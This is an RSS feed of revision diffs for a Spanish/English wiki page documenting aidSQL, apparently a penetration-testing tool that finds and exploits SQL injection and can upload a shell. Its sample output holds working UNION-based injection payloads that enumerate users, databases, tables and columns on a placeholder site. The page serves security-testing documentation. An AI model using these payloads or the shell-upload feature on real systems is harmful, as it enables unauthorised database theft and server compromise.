<?xml version="1.0" encoding="utf-8"?>
<rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom"><channel><title>Recent changes to aidsql-en</title><link>https://sourceforge.net/p/maguey/wiki/aidsql-en/</link><description>Recent changes to aidsql-en</description><atom:link href="https://sourceforge.net/p/maguey/wiki/aidsql-en/feed" rel="self"/><language>en</language><lastBuildDate>Wed, 11 Dec 2013 16:17:09 -0000</lastBuildDate><atom:link href="https://sourceforge.net/p/maguey/wiki/aidsql-en/feed" rel="self" type="application/rss+xml"/><item><title>aidsql-en modified by Maguey</title><link>https://sourceforge.net/p/maguey/wiki/aidsql-en/</link><description>&lt;div class="markdown_content"&gt;&lt;pre&gt;--- v3
+++ v4
@@ -175,7 +175,7 @@

 La herramienta de manera automática, guarda los resultados de la explotación y minado de datos dentro de la capeta interna: 
 &lt;ul&gt;
-&lt;li&gt;Folder /logs/[application name]
+&lt;/li&gt;&lt;li&gt;Folder /logs/\[application name\]
 &lt;/li&gt;&lt;li&gt;Log file - index.php_console.log
 &lt;/li&gt;&lt;li&gt;XML file - index.php_db_schemas.xml
 &lt;/li&gt;&lt;/ul&gt;
&lt;/pre&gt;
&lt;/div&gt;</description><dc:creator xmlns:dc="http://purl.org/dc/elements/1.1/">Maguey</dc:creator><pubDate>Wed, 11 Dec 2013 16:17:09 -0000</pubDate><guid>https://sourceforge.net6a8fcfb131d75bed301c9e2f11d9575a90872524</guid></item><item><title>aidsql-en modified by Maguey</title><link>https://sourceforge.net/p/maguey/wiki/aidsql-en/</link><description>&lt;div class="markdown_content"&gt;&lt;pre&gt;--- v2
+++ v3
@@ -66,7 +66,7 @@
 &lt;!-- **********************  USAGE ********************** --&gt;

 &lt;h3 style="color: #4CAB68;"&gt;Basic usage:&lt;/h3&gt;
-&lt;b&gt;Realizar un escaneo automático de una aplicación Web. &lt;/b&gt;La siguiente instrucción realiza un escaneo automático dentro una aplicación: 
+&lt;b&gt;Perform an automated scan on a web application. &lt;/b&gt;The following instruction initiates an automated scan on the web application.

 &lt;div id="code" style="background-color: #85BF93; padding-top: 20px; padding-right: 0px; padding-bottom: 20px; padding-left: 40px; margin-top: 0px; margin-right: 10px; margin-bottom: 0px; margin-left: 10px; border: 0px solid;"&gt;
 ./aidSQL --url=[URL] --no-shell
@@ -75,14 +75,14 @@
 &lt;p&gt;
 Dónde:
 &lt;ul&gt;
-&lt;li&gt;--url: Aplicación Web a escanear.
-&lt;/li&gt;&lt;li&gt;--no-shell: Deshabilita la carga de una shell
-&lt;/li&gt;&lt;/ul&gt;
-&lt;/p&gt;
-
-Nota: Por defecto, la herramienta está configurada para realizar el minado de datos al igual que la carga de una shell propia de la herramienta de manera automática posterior al descubrimiento de un parámetro vulnerable, por lo que se recomienda utilizar la opción  --no-shell  para reducir el impacto que pudiera ocasionar.
-
-La herramienta iniciara corriendo el mapeo del sitio para identificar las páginas y parámetros dentro de la aplicación.
+&lt;li&gt;--url: Web application URL address. 
+&lt;li&gt;--no-shell: Disabled the option to upload a shell. 
+
+
+
+Note: By defect the tool is configured to perform the data mining and upload a shell upon discovering a vulnerable parameter, thus it is recommended to disable the shell option to minimize the impact it may have on the web application and/or application server.
+
+The tool will begin with crawling through the web application in order to generate the site-map of the pages and parameters present.

 &lt;div id="code" style="background-color: #85BF93; padding-top: 20px; padding-right: 0px; padding-bottom: 20px; padding-left: 40px; margin-top: 0px; margin-right: 10px; margin-bottom: 0px; margin-left: 10px; border: 0px solid;"&gt;
 Normalized URL: http://midominio.com.mx/miaplicacion/&lt;br /&gt;
@@ -107,7 +107,7 @@

 &lt;/div&gt;&lt;br /&gt;

-Esta información posteriormente será utilizada para identificar los parámetros que son vulnerables por medio de la inyección de sentencias preestablecidas de SQL (sentencias “UNION”) para ser analizados dentro de las respuestas.
+This information is used next on the detection of vulnerable parameters through the injection of predefined SQL injections (UNION queries) and the analysis of the web application responses.

 &lt;div id="code" style="background-color: #85BF93; padding-top: 20px; padding-right: 0px; padding-bottom: 20px; padding-left: 40px; margin-top: 0px; margin-right: 10px; margin-bottom: 0px; margin-left: 10px; border: 0px solid;"&gt;
 Testing links ...&lt;br /&gt;
@@ -134,7 +134,7 @@

 &lt;/div&gt;&lt;br /&gt;

-Durante la ejecución del escaneo, en el caso en que la herramienta identifique un parámetro vulnerable a una inyección de SQL, iniciara el proceso de minado de la base de datos.
+During the scan execution, when a vulnerable parameter is detected, the data mining will be called to extract the information from the database.

 &lt;div id="code" style="background-color: #85BF93; padding-top: 20px; padding-right: 0px; padding-bottom: 20px; padding-left: 40px; margin-top: 0px; margin-right: 10px; margin-bottom: 0px; margin-left: 10px; border: 0px solid;"&gt;
 Site is vulnerable to sql injection!&lt;br /&gt;
@@ -166,7 +166,7 @@
 http://midominio.com.mx/miaplicacion&lt;br /&gt;/index.jsp?message=51761685aa5034e0731b9c9978073af0%27+&lt;br /&gt;UNION+ALL+SELECT+1%2CCONCAT%280x3c61696473716c3e%2CGROUP_CONCAT%28&lt;br /&gt;COLUMN_NAME%2C0x7c%2CCOLUMN_TYPE%2C0x7c%2CIF%28COLUMN_KEY%2CCOLUMN_KEY%2C0%29%2C0x7c%2CIF%28EXTRA%2CEXTRA%2C0%29+SEPARATOR+0x25%29%2C0x3c2f61696473716c3e%29%2C3%2C4%2C5+&lt;br /&gt;FROM+information_schema.columns+&lt;br /&gt;WHERE+table_schema%3D0x6f776173703130+AND+table_name%3D0x6163636f756e7473%3B+--+&amp;amp;password=prueba&amp;amp;user-info-php-submit-button=View%2BAccount%2BDetails&amp;amp;page=user-info.php
 &lt;/div&gt;&lt;br /&gt;

-Al final de la ejecución la herramienta desplegara un reporte de cuantas vulnerabilidades de inyección de SQL detecto durante el escaneo, al igual que el tiempo total de la ejecución del escaneo. 
+When the scan is completed, the tool will display a summary report of the detected vulnerabilities and the scan duration.

 &lt;div id="code" style="background-color: #85BF93; padding-top: 20px; padding-right: 0px; padding-bottom: 20px; padding-left: 40px; margin-top: 0px; margin-right: 10px; margin-bottom: 0px; margin-left: 10px; border: 0px solid;"&gt;
 VULNERABLE LINKS FOUND : 1&lt;br /&gt;
@@ -175,12 +175,12 @@

 La herramienta de manera automática, guarda los resultados de la explotación y minado de datos dentro de la capeta interna: 
 &lt;ul&gt;
-&lt;li&gt;Carpeta /logs/\[miaplicacion\]
-&lt;/li&gt;&lt;li&gt;Carpeta log - index.php_console.log
-&lt;/li&gt;&lt;li&gt;Carpeta xml - index.php_db_schemas.xml
-&lt;/li&gt;&lt;/ul&gt;
-
-Archivo index.php_console.log
+&lt;li&gt;Folder /logs/[application name]
+&lt;li&gt;Log file - index.php_console.log
+&lt;li&gt;XML file - index.php_db_schemas.xml
+
+
+index.php_console.log file example:

 &lt;div id="code" style="background-color: #85BF93; padding-top: 20px; padding-right: 0px; padding-bottom: 20px; padding-left: 40px; margin-top: 0px; margin-right: 10px; margin-bottom: 0px; margin-left: 10px; border: 0px solid;"&gt;
 HOST midominio.com.mx
@@ -213,7 +213,7 @@

 &lt;/div&gt;&lt;br /&gt;

-Archivo index.php_db_schemas.xml
+index.php_db_schemas.xml file example:

 &lt;div id="code" style="background-color: #85BF93; padding-top: 20px; padding-right: 0px; padding-bottom: 20px; padding-left: 40px; margin-top: 0px; margin-right: 10px; margin-bottom: 0px; margin-left: 10px; border: 0px solid;"&gt;
 &amp;lt;schemas&gt;&lt;br /&gt;
&lt;/div&gt;&lt;/li&gt;&lt;/li&gt;&lt;/li&gt;&lt;/div&gt;&lt;/li&gt;&lt;/li&gt;&lt;/div&gt;&lt;/pre&gt;
&lt;/div&gt;</description><dc:creator xmlns:dc="http://purl.org/dc/elements/1.1/">Maguey</dc:creator><pubDate>Wed, 11 Dec 2013 16:16:06 -0000</pubDate><guid>https://sourceforge.net4f7e73261de09653f41d061f380531262212716a</guid></item><item><title>aidsql-en modified by Maguey</title><link>https://sourceforge.net/p/maguey/wiki/aidsql-en/</link><description>&lt;div class="markdown_content"&gt;&lt;pre&gt;--- v1
+++ v2
@@ -8,48 +8,59 @@
 &lt;!-- **********************  PHASES ********************** --&gt;

 &lt;h3 style="color: #4CAB68;"&gt;Phase(s):&lt;/h3&gt;
-Primary: Discovery.
+Primary: Exploitation.
 Secondary:  N/A.

 &lt;!-- **********************  DESCRIPTION ********************** --&gt;

 &lt;h3 style="color: #4CAB68;"&gt;Description: &lt;/h3&gt;
-Tool that performs a vulnerability scan on web applications. It runs in two modes, the first one performs a spidering  of the web application and the second one uses dictionary based brute force attacks.
+Security application developed in PHP that helps identify and exploit in an automated way SQL Injection vulnerabilities.

 &lt;!-- **********************  OBJECTIVES ********************** --&gt;

 &lt;h3 style="color: #4CAB68;"&gt;Objective:&lt;/h3&gt;
 &lt;ul&gt;
-&lt;li&gt;Detect vulnerabilities on the web application.
+&lt;/li&gt;&lt;li&gt;Automated detection of parameters vulnerable to SQL Injection.
+&lt;/li&gt;&lt;li&gt;Automated and configurable data base data mining.
+&lt;/li&gt;&lt;li&gt;Automated shell upload in order to comprise the application server.
 &lt;/li&gt;&lt;/ul&gt;

 &lt;!-- **********************  FEATURES ********************** --&gt;

 &lt;h3 style="color: #4CAB68;"&gt;Features:&lt;/h3&gt;
-&lt;b&gt;Supported technologies:&lt;/b&gt; Web applications (HTTP).
+&lt;b&gt;Supported technologies:&lt;/b&gt; Web applications (HTTP/HTTPS) with a MySQL database backend.

 &lt;b&gt;Operative mode:&lt;/b&gt; Active.

 &lt;p&gt;
-Detect vulnerabilities on the web application.
-&lt;ul&gt;
-&lt;li&gt;Performs a predefined and configurable spidering on the web application; configurations include domain on the scope, restricted URLs and parameters, etc.
-&lt;/li&gt;&lt;li&gt;dentify common vulnerabilities such as Cross Site Script, SQL Injection, Path Traversal, Information Disclosure, etc.
-&lt;/li&gt;&lt;li&gt;Provides a configurable dictionary base brute force attack functionality in order to detect commons resources such as administrative, default and test pages, files backups (.old), etc.
-&lt;/li&gt;&lt;li&gt;Has the capability to include self-defined dictionaries to be used on the brute force module.
-&lt;/li&gt;&lt;/ul&gt;
-&lt;/p&gt;
+Automated detection of parameters vulnerable to SQL Injection.
+&lt;ul&gt;
+&lt;li&gt;Automated parameter tampering for both URL parameters (GET) and form data (POST).
+&lt;/li&gt;&lt;li&gt;Generates a configurable site-map of the application in order to identify all its resources: pages and parameters for further testing.
+&lt;/li&gt;&lt;li&gt;Provides the name of the parameter and URL from the detected vulnerabilities.
+&lt;/li&gt;&lt;/ul&gt;
+
+
+&lt;p&gt;
+Automated and configurable data base data mining.
+&lt;ul&gt;
+&lt;li&gt;Retrieves the following information 
+&lt;ul&gt;
+&lt;li&gt;Database user name.
+&lt;/li&gt;&lt;li&gt;Database name.
+&lt;/li&gt;&lt;li&gt;Database version.
+&lt;/li&gt;&lt;li&gt;Database tables.
+&lt;/li&gt;&lt;li&gt;Database tables schema: keys, fields names and type.
+&lt;/li&gt;&lt;/ul&gt;
+&lt;/li&gt;&lt;/ul&gt;
+&lt;/p&gt;
+

 &lt;p&gt;
 &lt;b&gt;Reports:&lt;/b&gt;&lt;br /&gt;
 Output reports:  &lt;span style="color: #4CAB68; font-weight: bold; font-style: italic; font-size: 20px;"&gt;&amp;#10004;&lt;/span&gt;
-&lt;br /&gt;
-Reports in HTML format which includes the visited URLS and detected vulnerabilities divided into three sections:
-&lt;ul&gt;
-&lt;li&gt;URL: URLs detected by the spidering module.
-&lt;/li&gt;&lt;li&gt;Document type: URL categorization by content based on the response.
-&lt;/li&gt;&lt;li&gt;Detected vulnerabilities: URL groups by matching vulnerabilities.
-&lt;/li&gt;&lt;/ul&gt;
+&lt;ul&gt;
+&lt;li&gt;Merge report from the exploitation and data mining in TXT and XML format.
 &lt;/li&gt;&lt;/ul&gt;&lt;/p&gt;

 &lt;!-- **********************  USAGE ********************** --&gt;
&lt;/pre&gt;
&lt;/div&gt;</description><dc:creator xmlns:dc="http://purl.org/dc/elements/1.1/">Maguey</dc:creator><pubDate>Wed, 11 Dec 2013 16:08:33 -0000</pubDate><guid>https://sourceforge.net4cd71e2a6c94cbf557219545814644439051d12c</guid></item><item><title>aidsql-en modified by Maguey</title><link>https://sourceforge.net/p/maguey/wiki/aidsql-en/</link><description>&lt;div class="markdown_content"&gt;&lt;!-- ###################################### ENGLISH VERSION ###################################### --&gt;
&lt;p&gt;&lt;img height="25%" src="https://sourceforge.net/p/maguey/wiki/Home/attachment/LogoMaguey.png" style="float: right;" width="25%" /&gt;&lt;br /&gt;
&lt;br /&gt;&lt;br /&gt;&lt;/p&gt;
&lt;div id="link" style="text-align: right;"&gt;&lt;p&gt;&lt;a href="https://sourceforge.net/p/maguey/wiki/Toolset-en/" style="color: #4CAB68; text-decoration: underline;"&gt;Back&lt;/a&gt;&amp;nbsp;&amp;nbsp;&lt;a href="https://sourceforge.net/p/maguey/wiki/aidsql-es" style="color: #4CAB68; text-decoration: underline;"&gt;Español&lt;/a&gt;&lt;/p&gt;&lt;/div&gt;
&lt;h1 style="color: #4CAB68;"&gt;aidsql&lt;/h1&gt;
&lt;!-- **********************  PHASES ********************** --&gt;
&lt;h3 style="color: #4CAB68;"&gt;Phase(s):&lt;/h3&gt;
&lt;p&gt;Primary: Discovery.&lt;br /&gt;
Secondary:  N/A.&lt;/p&gt;
&lt;!-- **********************  DESCRIPTION ********************** --&gt;
&lt;h3 style="color: #4CAB68;"&gt;Description: &lt;/h3&gt;
&lt;p&gt;Tool that performs a vulnerability scan on web applications. It runs in two modes, the first one performs a spidering  of the web application and the second one uses dictionary based brute force attacks.&lt;/p&gt;
&lt;!-- **********************  OBJECTIVES ********************** --&gt;
&lt;h3 style="color: #4CAB68;"&gt;Objective:&lt;/h3&gt;
&lt;ul&gt;
&lt;li&gt;Detect vulnerabilities on the web application.
&lt;/li&gt;&lt;/ul&gt;
&lt;!-- **********************  FEATURES ********************** --&gt;
&lt;h3 style="color: #4CAB68;"&gt;Features:&lt;/h3&gt;
&lt;p&gt;&lt;b&gt;Supported technologies:&lt;/b&gt; Web applications (HTTP).&lt;/p&gt;
&lt;p&gt;&lt;b&gt;Operative mode:&lt;/b&gt; Active.&lt;/p&gt;
&lt;p&gt;
Detect vulnerabilities on the web application.
&lt;ul&gt;
&lt;li&gt;Performs a predefined and configurable spidering on the web application; configurations include domain on the scope, restricted URLs and parameters, etc.
&lt;/li&gt;&lt;li&gt;dentify common vulnerabilities such as Cross Site Script, SQL Injection, Path Traversal, Information Disclosure, etc.
&lt;/li&gt;&lt;li&gt;Provides a configurable dictionary base brute force attack functionality in order to detect commons resources such as administrative, default and test pages, files backups (.old), etc.
&lt;/li&gt;&lt;li&gt;Has the capability to include self-defined dictionaries to be used on the brute force module.
&lt;/li&gt;&lt;/ul&gt;
&lt;/p&gt;
&lt;p&gt;
&lt;b&gt;Reports:&lt;/b&gt;&lt;br /&gt;
Output reports:  &lt;span style="color: #4CAB68; font-weight: bold; font-style: italic; font-size: 20px;"&gt;&amp;#10004;&lt;/span&gt;
&lt;br /&gt;
Reports in HTML format which includes the visited URLS and detected vulnerabilities divided into three sections:
&lt;ul&gt;
&lt;li&gt;URL: URLs detected by the spidering module.
&lt;/li&gt;&lt;li&gt;Document type: URL categorization by content based on the response.
&lt;/li&gt;&lt;li&gt;Detected vulnerabilities: URL groups by matching vulnerabilities.
&lt;/li&gt;&lt;/ul&gt;
&lt;/p&gt;
&lt;!-- **********************  USAGE ********************** --&gt;
&lt;h3 style="color: #4CAB68;"&gt;Basic usage:&lt;/h3&gt;
&lt;p&gt;&lt;b&gt;Realizar un escaneo automático de una aplicación Web. &lt;/b&gt;La siguiente instrucción realiza un escaneo automático dentro una aplicación: &lt;/p&gt;
&lt;div id="code" style="background-color: #85BF93; padding-top: 20px; padding-right: 0px; padding-bottom: 20px; padding-left: 40px; margin-top: 0px; margin-right: 10px; margin-bottom: 0px; margin-left: 10px; border: 0px solid;"&gt;
./aidSQL --url=[URL] --no-shell
&lt;/div&gt;
&lt;p&gt;&lt;br /&gt;&lt;/p&gt;
&lt;p&gt;
Dónde:
&lt;ul&gt;
&lt;li&gt;--url: Aplicación Web a escanear.
&lt;/li&gt;&lt;li&gt;--no-shell: Deshabilita la carga de una shell
&lt;/li&gt;&lt;/ul&gt;
&lt;/p&gt;
&lt;p&gt;Nota: Por defecto, la herramienta está configurada para realizar el minado de datos al igual que la carga de una shell propia de la herramienta de manera automática posterior al descubrimiento de un parámetro vulnerable, por lo que se recomienda utilizar la opción  --no-shell  para reducir el impacto que pudiera ocasionar.&lt;/p&gt;
&lt;p&gt;La herramienta iniciara corriendo el mapeo del sitio para identificar las páginas y parámetros dentro de la aplicación.&lt;/p&gt;
&lt;div id="code" style="background-color: #85BF93; padding-top: 20px; padding-right: 0px; padding-bottom: 20px; padding-left: 40px; margin-top: 0px; margin-right: 10px; margin-bottom: 0px; margin-left: 10px; border: 0px solid;"&gt;
Normalized URL: http://midominio.com.mx/miaplicacion/&lt;br /&gt;
&lt;br /&gt;
Crawling ...&lt;br /&gt;
&lt;br /&gt;
Fetching content from http://midominio.com.mx/miaplicacion/&lt;br /&gt;
&lt;br /&gt;
200 OK&lt;br /&gt;
&lt;br /&gt;
TOTAL URL's found: 55&lt;br /&gt;
&lt;br /&gt;
Add file index.jsp ...&lt;br /&gt;
&lt;br /&gt;
Page "index.jsp" matches required types php,asp,aspx,cfm,do,jsp,htm,html&lt;br /&gt;
&lt;br /&gt;
Add URL " http://midominio.com.mx/miaplicacion/index.jsp?message=Welcome"&lt;br /&gt;
&lt;br /&gt;
Parsing previously crawled URL, looking for new parameters&lt;br /&gt;
&lt;br /&gt;
Adding new parameter "do"&lt;br /&gt;
&lt;/div&gt;
&lt;p&gt;&lt;br /&gt;&lt;/p&gt;
&lt;p&gt;Esta información posteriormente será utilizada para identificar los parámetros que son vulnerables por medio de la inyección de sentencias preestablecidas de SQL (sentencias “UNION”) para ser analizados dentro de las respuestas.&lt;/p&gt;
&lt;div id="code" style="background-color: #85BF93; padding-top: 20px; padding-right: 0px; padding-bottom: 20px; padding-left: 40px; margin-top: 0px; margin-right: 10px; margin-bottom: 0px; margin-left: 10px; border: 0px solid;"&gt;
Testing links ...&lt;br /&gt;
&lt;br /&gt;
 1. { http://midominio.com.mx/miaplicacion/index.jsp }  &lt;br /&gt;
&lt;br /&gt;
Normalized URL: http://midominio.com.mx/miaplicacion/index.jsp &lt;br /&gt;
 Set method GET …&lt;br /&gt;
&lt;br /&gt;
Load sqli =&gt; mysql5 ... OK &lt;br /&gt;
&lt;br /&gt;
Normalized URL: http://midominio.com.mx/miaplicacion/index.jsp?message=Welcome&lt;br /&gt;
&lt;br /&gt;
sql injection plugin...&lt;br /&gt;
&lt;br /&gt;
[1][ [message]  | METHOD: unionQuery&lt;br /&gt;
&lt;br /&gt;
[QUERY] | b54293624e8b649e5e948364b6e4a9cb UNION ALL SELECT CONCAT(0x3c61696473716c3e,1,0x3c2f61696473716c3e)/*&lt;br /&gt;
&lt;br /&gt;
Normalized URL: http://midominio.com.mx/miaplicacion/index.jsp?message=b54293624e8b649e5e948364b6e4a9cb+&lt;br /&gt;UNION+ALL+SELECT+CONCAT%280x3c61696473716c3e%2C1%2C0x3c2f61696473716c3e%29%2F%2A &lt;br /&gt;
 [WW] WARNING: GOT 403&lt;br /&gt;
&lt;br /&gt;
 [2][ message]  | METHOD: unionQuery …&lt;br /&gt;
&lt;/div&gt;
&lt;p&gt;&lt;br /&gt;&lt;/p&gt;
&lt;p&gt;Durante la ejecución del escaneo, en el caso en que la herramienta identifique un parámetro vulnerable a una inyección de SQL, iniciara el proceso de minado de la base de datos.&lt;/p&gt;
&lt;div id="code" style="background-color: #85BF93; padding-top: 20px; padding-right: 0px; padding-bottom: 20px; padding-left: 40px; margin-top: 0px; margin-right: 10px; margin-bottom: 0px; margin-left: 10px; border: 0px solid;"&gt;
Site is vulnerable to sql injection!&lt;br /&gt;
&lt;br /&gt;
Skipping calling plugin's get shell method&lt;br /&gt;
&lt;br /&gt;
Fetching database user ...&lt;br /&gt;
&lt;br /&gt;
[message] | METHOD: unionQuery&lt;br /&gt;
&lt;br /&gt;
 [QUERY]    | 51761685aa5034e0731b9c9978073af0' UNION ALL SELECT 1,CONCAT(0x3c61696473716c3e,USER(),0x3c2f61696473716c3e),3,4,5; --  
Normalized URL: http://midominio.com.mx/miaplicacion/index.jsp?message=51761685aa5034e0731b9c9978073af0%27+UNION+ALL+&lt;br /&gt;SELECT+1%2CCONCAT%280x3c61696473716c3e%2CUSER%28%29%2C0x3c2f61696473716c3e%29%2C3%2C4%2C5%3B+--+
&lt;br /&gt;
FOUND DATABASE seguridad &lt;br /&gt;
[message]   | METHOD: unionQuery&lt;br /&gt;
&lt;br /&gt;
[QUERY] | 51761685aa5034e0731b9c9978073af0' UNION ALL SELECT 1,CONCAT(0x3c61696473716c3e,GROUP_CONCAT&lt;br /&gt;(TABLE_NAME,0x7c,TABLE_TYPE,0x7c,ENGINE,0x7c,TABLE_COLLATION,0x7c,&lt;br /&gt;IF(AUTO_INCREMENT,1,0)),0x3c2f61696473716c3e),3,4,5 FROM information_schema.tables WHERE table_schema=0x6f776173703130; -- 
&lt;br /&gt;
Normalized URL: &lt;br /&gt;
http://midominio.com.mx/miaplicacion/index.jsp?message=51761685aa5034e0731b9c9978073af0%27+&lt;br /&gt;UNION+ALL+SELECT+1%2CCONCAT%280x3c61696473716c3e%2CGROUP_CONCAT%28&lt;br /&gt;TABLE_NAME%2C0x7c%2CTABLE_TYPE%2C0x7c%2CENGINE%2C0x7c%2C&lt;br /&gt;TABLE_COLLATION%2C0x7c%2CIF%28AUTO_INCREMENT%2C1%2C0%29%29%2C0x3c2f61696473716c3e%29%2C3%2C4%2C5+FROM+information_schema.tables+WHERE+table_schema%3D0x6f776173703130%3B+--+
&lt;br /&gt;
Fetching table "cuentas" columns ...&lt;br /&gt;
&lt;br /&gt;
[message]   | METHOD: unionQuery&lt;br /&gt;
&lt;br /&gt;
[QUERY] | 51761685aa5034e0731b9c9978073af0' UNION ALL SELECT 1,CONCAT(0x3c61696473716c3e,GROUP_CONCAT&lt;br /&gt;(COLUMN_NAME,0x7c,COLUMN_TYPE,0x7c,IF(COLUMN_KEY,COLUMN_KEY,0),0x7c,IF(EXTRA,EXTRA,0) SEPARATOR 0x25),0x3c2f61696473716c3e),3,4,5 &lt;br /&gt;FROM information_schema.columns WHERE table_schema=0x6f776173703130 AND table_name=0x6163636f756e7473; -- 
&lt;br /&gt;
Normalized URL:&lt;br /&gt; 
http://midominio.com.mx/miaplicacion&lt;br /&gt;/index.jsp?message=51761685aa5034e0731b9c9978073af0%27+&lt;br /&gt;UNION+ALL+SELECT+1%2CCONCAT%280x3c61696473716c3e%2CGROUP_CONCAT%28&lt;br /&gt;COLUMN_NAME%2C0x7c%2CCOLUMN_TYPE%2C0x7c%2CIF%28COLUMN_KEY%2CCOLUMN_KEY%2C0%29%2C0x7c%2CIF%28EXTRA%2CEXTRA%2C0%29+SEPARATOR+0x25%29%2C0x3c2f61696473716c3e%29%2C3%2C4%2C5+&lt;br /&gt;FROM+information_schema.columns+&lt;br /&gt;WHERE+table_schema%3D0x6f776173703130+AND+table_name%3D0x6163636f756e7473%3B+--+&amp;amp;password=prueba&amp;amp;user-info-php-submit-button=View%2BAccount%2BDetails&amp;amp;page=user-info.php
&lt;/div&gt;
&lt;p&gt;&lt;br /&gt;&lt;/p&gt;
&lt;p&gt;Al final de la ejecución la herramienta desplegara un reporte de cuantas vulnerabilidades de inyección de SQL detecto durante el escaneo, al igual que el tiempo total de la ejecución del escaneo. &lt;/p&gt;
&lt;div id="code" style="background-color: #85BF93; padding-top: 20px; padding-right: 0px; padding-bottom: 20px; padding-left: 40px; margin-top: 0px; margin-right: 10px; margin-bottom: 0px; margin-left: 10px; border: 0px solid;"&gt;
VULNERABLE LINKS FOUND  : 1&lt;br /&gt;
TOTAL TIME          : 53 seconds&lt;br /&gt;
&lt;/div&gt;
&lt;p&gt;&lt;br /&gt;&lt;/p&gt;
&lt;p&gt;La herramienta de manera automática, guarda los resultados de la explotación y minado de datos dentro de la capeta interna: &lt;br /&gt;
&lt;ul&gt;&lt;br /&gt;
&lt;li&gt;Carpeta /logs/[miaplicacion]&lt;br /&gt;
&lt;/li&gt;&lt;li&gt;Carpeta log - index.php_console.log&lt;br /&gt;
&lt;/li&gt;&lt;li&gt;Carpeta xml - index.php_db_schemas.xml&lt;br /&gt;
&lt;/li&gt;&lt;/ul&gt;&lt;/p&gt;
&lt;p&gt;Archivo index.php_console.log&lt;/p&gt;
&lt;div id="code" style="background-color: #85BF93; padding-top: 20px; padding-right: 0px; padding-bottom: 20px; padding-left: 40px; margin-top: 0px; margin-right: 10px; margin-bottom: 0px; margin-left: 10px; border: 0px solid;"&gt;
HOST midominio.com.mx
------------------------------------&lt;br /&gt;
PLUGIN NAME     :   UNION&lt;br /&gt;
PLUGIN AUTHOR       :   Juan Stange&lt;br /&gt;
REQUEST VARIABLES   :   message, do, info, page,…&lt;br /&gt;
VULNERABLE LINK     :   http://midominio.com.mx/miaplicacion&lt;br /&gt;/index.jsp?message==0eb751e9f79eb91238fc1902844d30e6%27+UNION+ALL+&lt;br /&gt;SELECT+1%2CCONCAT%280x3c61696473716c3e%2CGROUP_CONCAT%28&lt;br /&gt;COLUMN_NAME%2C0x7c%2CCOLUMN_TYPE%2C0x7c%2CIF%28COLUMN_KEY%2CCOLUMN_KEY%2C0%29%2C0x7c%2CIF%28EXTRA%2CEXTRA%2C0%29+SEPARATOR+0x25%29%2C0x3c2f61696473716c3e&lt;br /&gt;%29%2C3%2C4%2C5+FROM+information_schema.columns+WHERE+&lt;br /&gt;table_schema%3D0x6f776173703130+AND+table_name%3D0x70656e5f746573745f746f6f6c73%3B+--+ &lt;br /&gt;
------------------------------------------------&lt;br /&gt;
SCHEMA seguridad&lt;br /&gt;
------------------------------------------------&lt;br /&gt;
VERSION : 5.5.16&lt;br /&gt;
DATADIR : &lt;br /&gt;
&lt;br /&gt;
TABLE cuentas&lt;br /&gt;
---------------------&lt;br /&gt;
type        :   BASE TABLE&lt;br /&gt;
engine      :   InnoDB&lt;br /&gt;
collation       :   latin1_swedish_ci&lt;br /&gt;
increment   :   1&lt;br /&gt;
&lt;br /&gt;
COLUMNS&lt;br /&gt;
---------------------&lt;br /&gt;
NAME        :   cid&lt;br /&gt;
        type        int(11)&lt;br /&gt;
        key     0&lt;br /&gt;
        extra       0&lt;br /&gt;
NAME        :   username&lt;br /&gt;
…&lt;br /&gt;
&lt;/div&gt;
&lt;p&gt;&lt;br /&gt;&lt;/p&gt;
&lt;p&gt;Archivo index.php_db_schemas.xml&lt;/p&gt;
&lt;div id="code" style="background-color: #85BF93; padding-top: 20px; padding-right: 0px; padding-bottom: 20px; padding-left: 40px; margin-top: 0px; margin-right: 10px; margin-bottom: 0px; margin-left: 10px; border: 0px solid;"&gt;
&amp;lt;schemas&gt;&lt;br /&gt;
&amp;lt;database name="owasp10" version="5.5.16" datadir=""&gt;&lt;br /&gt;
&amp;lt;tables&gt;&lt;br /&gt;
&amp;lt;table name="accounts" type="BASE TABLE" engine="InnoDB" collation="latin1_swedish_ci" increment="1"&gt;&lt;br /&gt;
&amp;lt;column name="cid"&gt;&amp;lt;type&gt;int(11)&amp;lt;/type&gt;&amp;lt;key&gt;0&amp;lt;/key&gt;&amp;lt;extra&gt;0&amp;lt;/extra&gt;&amp;lt;/column&gt;&lt;br /&gt;
&amp;lt;column name="username"&gt;&amp;lt;type&gt;text&amp;lt;/type&gt;&amp;lt;key&gt;0&amp;lt;/key&gt;&amp;lt;extra&gt;0&amp;lt;/extra&gt;&amp;lt;/column&gt;&lt;br /&gt;
…&lt;br /&gt;
&lt;/div&gt;
&lt;p&gt;&lt;br /&gt;&lt;/p&gt;
&lt;!-- **********************  RESOURCES ********************** --&gt;
&lt;h3 style="color: #4CAB68;"&gt;Resources:&lt;/h3&gt;
&lt;p&gt;&lt;b&gt;Link:&lt;/b&gt; &lt;a href="http://code.google.com/p/aidsql/." rel="nofollow"&gt;http://code.google.com/p/aidsql/.&lt;/a&gt;&lt;br /&gt;
&lt;b&gt;Author(s):&lt;/b&gt; jpfstange&lt;br /&gt;
LynxSec IT consulting and security.&lt;br /&gt;
&lt;b&gt;Contact:&lt;/b&gt; lynxsec [at] gmail.com&lt;br /&gt;
IRC: irc.freenode.net #aidsql &lt;br /&gt;
Twitter: &lt;a href="http://twitter.com/#!aidsql" rel="nofollow"&gt;http://twitter.com/#!aidsql&lt;/a&gt;&lt;br /&gt;
&lt;b&gt;License:&lt;/b&gt; GNU GPL v2&lt;/p&gt;&lt;/div&gt;</description><dc:creator xmlns:dc="http://purl.org/dc/elements/1.1/">Maguey</dc:creator><pubDate>Wed, 11 Dec 2013 15:30:18 -0000</pubDate><guid>https://sourceforge.net267f73fc558afc52cf0ad09b5813c0c45f9abdbe</guid></item></channel></rss>